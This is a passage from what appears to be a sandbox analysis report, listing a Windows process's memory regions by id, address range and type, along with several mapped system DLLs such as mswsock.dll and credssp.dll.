"pagefile_0x0000000003950000" filename = "" Region: id = 1057 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1058 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1059 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1060 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1061 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1062 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1063 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1064 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1065 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1066 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1067 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1068 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1069 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1070 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1071 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1072 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1073 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1074 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1075 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1076 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1077 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1078 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1079 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1080 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1081 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1082 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1083 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1084 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1085 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1086 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1087 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1088 start_va = 0x3950000 end_va = 0x3961fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1089 start_va = 0x3970000 end_va = 0x397dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 1090 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1091 start_va = 0x7770000 end_va = 0x782ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1092 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1093 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1094 start_va = 0x97a0000 end_va = 0x99bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097a0000" filename = "" Region: id = 1095 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1096 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1097 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1098 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1099 start_va = 0x7fd0000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 1100 start_va = 0x3950000 end_va = 0x3950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1101 start_va = 0x97a0000 end_va = 0x9899fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000097a0000" filename = "" Region: id = 1102 start_va = 0x9940000 end_va = 0x99bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009940000" filename = "" Region: id = 1103 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1104 start_va = 0x3950000 end_va = 0x3961fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1105 start_va = 0x3970000 end_va = 0x397dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 1106 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1107 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1838 start_va = 0x3950000 end_va = 0x3954fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1840 start_va = 0x3960000 end_va = 0x3975fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1841 start_va = 0x63d0000 end_va = 0x644ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063d0000" filename = "" Region: id = 1842 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1843 start_va = 0x99c0000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099c0000" filename = "" Region: id = 1844 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 1845 start_va = 0x7fd0000 end_va = 0x804ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 1846 start_va = 0x8050000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008050000" filename = "" Region: id = 1847 start_va = 0x97d0000 end_va = 0x984ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097d0000" filename = "" Region: id = 1848 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1849 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1850 start_va = 0x3a10000 end_va = 0x3a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 1851 start_va = 0x3a30000 end_va = 0x3a3dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a30000" filename = "" Region: id = 1852 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1853 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1854 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1855 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1856 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1857 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1858 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1859 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1860 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1861 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1862 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1863 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1864 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1865 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1866 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1867 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1868 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1869 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1870 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1871 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1872 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1873 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1874 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1875 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1876 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1877 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1878 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1879 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1880 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1881 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1882 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1883 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1884 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1885 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1886 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1887 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1888 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1889 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1890 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1891 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1892 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1893 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1894 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1895 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1896 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1897 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1898 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1899 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1900 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1901 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1902 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1903 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1904 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1905 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1906 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1907 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1908 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1909 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1910 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1911 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1912 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1913 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1914 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1915 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1916 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1917 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1918 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1919 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1920 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1921 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1922 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1923 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1924 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1925 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1926 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1927 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1928 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1929 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1930 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1931 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1932 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1933 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1934 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1935 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1936 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1937 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1938 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1939 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1940 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1941 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1942 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1943 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1944 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1945 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1946 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1947 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1948 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1949 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1950 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1951 start_va = 0x3a20000 end_va = 0x3a31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1952 start_va = 0x3b20000 end_va = 0x3b2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b20000" filename = "" Region: id = 1953 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1954 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1955 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1956 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1957 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1958 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1959 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1960 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1961 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1962 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1963 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1964 start_va = 